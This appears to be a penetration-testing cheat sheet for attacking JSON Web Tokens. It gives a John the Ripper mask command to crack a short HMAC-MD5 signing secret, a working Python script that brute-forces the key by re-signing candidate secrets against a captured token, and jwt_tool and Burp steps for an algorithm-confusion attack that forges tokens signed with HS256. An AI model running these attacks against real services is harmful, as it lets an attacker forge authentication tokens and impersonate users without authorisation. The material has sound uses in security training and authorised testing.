JWT
MD5_HMAC
Easy way
# Mask = fixed prefix "fsrwjcfszeg" followed by five ?l (lowercase-letter) positions,
# the same keyspace the Python generator comment below builds; --format matches the
# token's MD5_HMAC alg.  Feasible only because the secret is short and low-entropy.
john --mask=fsrwjcfszeg?l?l?l?l?l --format=HMAC-MD5 jwt.txt
Hard way
import base64
import hashlib
import hmac
import json
def remove_padding(encoded_string):
    """Drop trailing '=' padding so a base64 segment is JWT-style (unpadded).

    Args:
        encoded_string: base64/base64url text, possibly ending in '=' chars.

    Returns:
        The same text with every trailing '=' removed; other characters untouched.
    """
    trimmed = encoded_string
    while trimmed.endswith("="):
        trimmed = trimmed[:-1]
    return trimmed
def jwt_creator(secret_key):
    """Build the token ``header.payload.signature`` signed with HMAC-MD5.

    The header and payload are fixed, pre-encoded segments (they decode to
    ``{"alg":"MD5_HMAC"}`` and ``{"username":"s"}``); only the signature
    depends on ``secret_key``.  The secret is used directly as the HMAC key,
    which is why a short, guessable key can be recovered offline by
    re-signing and comparing — a long random key is the defensive answer.

    Args:
        secret_key: HMAC key as a str; UTF-8 encoded before signing.

    Returns:
        The three dot-joined segments, the signature base64url-encoded
        with '=' padding removed.
    """
    header_b64 = 'eyJhbGciOiJNRDVfSE1BQyJ9'
    payload_b64 = 'eyJ1c2VybmFtZSI6InMifQ'
    signing_input = f"{header_b64}.{payload_b64}"
    mac = hmac.new(secret_key.encode("utf-8"), signing_input.encode("utf-8"), hashlib.md5)
    # Padding is stripped inline rather than via the remove_padding helper.
    sig_b64 = base64.urlsafe_b64encode(mac.digest()).decode("utf-8").rstrip("=")
    return f"{signing_input}.{sig_b64}"
original_jwt = 'eyJhbGciOiJNRDVfSE1BQyJ9.eyJ1c2VybmFtZSI6InMifQ.49BQc1Pj96LW8tUhAHXzYA'
permutations_file = 'permutations.txt'
secret_found = None

### Code to generate the permutations ###
#import itertools
#characters = 'abcdefghijklmnopqrstuvwxyz'
#permutations = itertools.product(characters, 5)
#with open('permutations.txt', 'w') as file:
#    for perm in permutations:
#        line = 'fsrwjcfszeg' + ''.join(perm) + '\n'
#        file.write(line)
##########################################

# Read the wordlist one candidate per line and stop at the first one whose
# recomputed token equals the original.  Every attempt is printed, as in the
# original script.  The comparison is on the whole token, so the fixed
# header/payload must match as well as the signature.
with open(permutations_file, 'r') as wordlist:
    for line in wordlist:
        secret_key = line.strip()
        token = jwt_creator(secret_key)
        print(token)
        if token != original_jwt:
            continue
        secret_found = secret_key
        break

print(f"Found secret: {secret_found}" if secret_found else "No matching secret found.")
Key Confusion attack
Generate a public key.
python3 jwt_tool.py JWT_TOKEN -X k -jw jwks.json -V
# OR
python3 jwt_tool.py JWT_TOKEN -X k -pk public.pem -V
Base64 encode the public key
cat kid_0_1694791448.pem | base64 -w 0 | c
Now generate a new symmetric key using the Burp Suite JWT Editor extension.

Now click on Sign and select the newly generated symmetric key.

Finally, change the algorithm in the alg header to HS256 and edit the body as needed.

References: